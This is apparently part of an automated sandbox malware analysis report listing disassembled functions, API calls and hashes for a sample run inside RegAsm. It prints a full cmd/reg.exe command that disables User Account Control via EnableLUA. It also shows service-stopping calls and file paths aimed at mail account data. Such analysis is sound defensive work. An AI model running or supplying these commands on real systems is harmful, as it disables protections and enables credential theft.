                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                  • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                                                                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                                                                                                  Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                  • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1922816806-0
                                                                                                                                                                                                  • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                  • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                                  Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3594823470-0
                                                                                                                                                                                                  • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                  • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                                  Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 493672254-0
                                                                                                                                                                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                                                                                  Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                  • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                  • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                                  Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                  • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                                  Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                  • _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                  • _free.LIBCMT ref: 004482F4
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                  • _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                                                                                  Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                                                                  Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                                                                  Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                                                                  Function 0044E769 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 168COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044E8D5
                                                                                                                                                                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                                                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                                                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                  • String ID: *?$.$t'`/
                                                                                                                                                                                                  • API String ID: 2812119850-2728941232
                                                                                                                                                                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                                                                                  Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                                                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                  Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                  • String ID: 0$MsgWindowClass
                                                                                                                                                                                                  • API String ID: 2877667751-2410386613
                                                                                                                                                                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                                                                                  Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  • API String ID: 2922976086-4183131282
                                                                                                                                                                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
